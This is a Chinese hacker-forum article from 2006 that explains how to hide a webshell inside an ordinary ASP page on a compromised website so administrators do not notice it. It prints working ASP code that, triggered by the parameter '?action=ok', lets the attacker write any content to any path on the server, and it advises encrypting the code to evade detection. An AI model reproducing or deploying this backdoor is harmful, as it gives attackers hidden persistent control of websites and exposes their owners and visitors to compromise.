黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 木马天地 >> 文章正文
[推荐]隐蔽的插入型ASP木马
      ★★★★★
隐蔽的插入型ASP木马
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-9-22

得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 管理员都也不都是混饭吃的,所以我们要隐藏好我们的WEBSHELL, 下面是关于ASP插入型 木马 几种利用方法 不容易被发现~~~呵呵 我拿个webshell给大家做演示: 好,我们随便找一个要做手脚的ASP文件 1.在我们要做手脚的ASP文件里加入如下内容 :

<% if request(action)=ok then %> ################################## <% end if %> 
在#########################处加入你的shell代码 代码我已经提供了 如newmm.asp 木马 (建议加密代码):大家很熟悉吧,我以前的教程做过分析了
 <% if request(action)=ok then %> <%dim objFSO%> <%dim fdata%> <%dim objCountFile%> 
<%on error resume next%> <%Set objFSO = Server.CreateObject(Scripting.FileSystemObject)%> 
<%if Trim(request(syfdpath))<> then%> <%fdata = request(cyfddata)%> 
<%set objCountFile=objFSO.CreateTextFile(request(syfdpath),True)%> 
<%objCountFile.Write fdata%> <%if err =0 then%> <%response.write <font color=red>save Success!</font>%> 
<%else%> <%response.write <font color=red>Save UnSuccess!</font>%> <%end if%> <%err.clear%> 
<%end if%> <%objCountFile.Close%> <%Set objCountFile=Nothing%> <%Set objFSO = Nothing%> 
<%Response.write <form action= method=post>%> 
<%Response.write 保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>%>
 <%Response.Write <input type=text name=syfdpath width=32 size=50>%> <%Response.Write <br>%> 
<%Response.write 本文件绝对路径%> <%=server.mappath(Request.ServerVariables(SCRIPT_NAME))%>
 <%Response.write <br>%> <%Response.write 输入的内容:%> 
<%Response.write <textarea name=cyfddata cols=80 rows=10 width=32></textarea>%> 
<%Response.write <input type=submit value=保存>%> <%Response.write </form>%> 
<% end if%> 
加入以后不影响正常浏揽 访问的时候在你做了手脚的ASP文件后面加上?action=ok(例如:index.asp?action=ok) 就可以调出shell了,不影响正常浏揽 大家看到了吧,呵呵 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    2007年IE 0day 网马04-02
    修改特征码打造免杀后门之灰鸽子04-02
    挂马代码大全03-22
    打造不死的asp木马03-21
    木马免杀原理详解01-31
    新编MS07004网页木马源码01-27
    灰鸽子VIP2006服务端过各种杀毒软01-26
    木马免杀之加壳与改入口点法01-23
    灰鸽子超级详细教程(看了就会)01-16
    灰鸽子远程管理软件新手技术手册12-27
    二个非常规ASP木马12-13
    木马免杀浓缩精华版教程不看后悔12-05
    相 关 文 章
  • 金睛火眼—进程中判断出病毒和木马

  • 如何防御网络游戏外挂木马

  • 打造不死的asp木马

  • ASP中SQL Injection的初级防护(完整总结

  • 木马驻留系统的几种方式

  • Windows 2003 Enterprise Edition IIS6

  • 如何清除"雨薇在线"木马

  • 木马 ctfnom.exe TIMPlatform.exe TIMP

  • 游戏木马检测大师保你游戏密码永不丢

  • js asp c# 防止sql注入

  • Windows操作系统常遇木马的预防技巧

  • 动态网站Web开发PHP、ASP还是ASP.NET

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886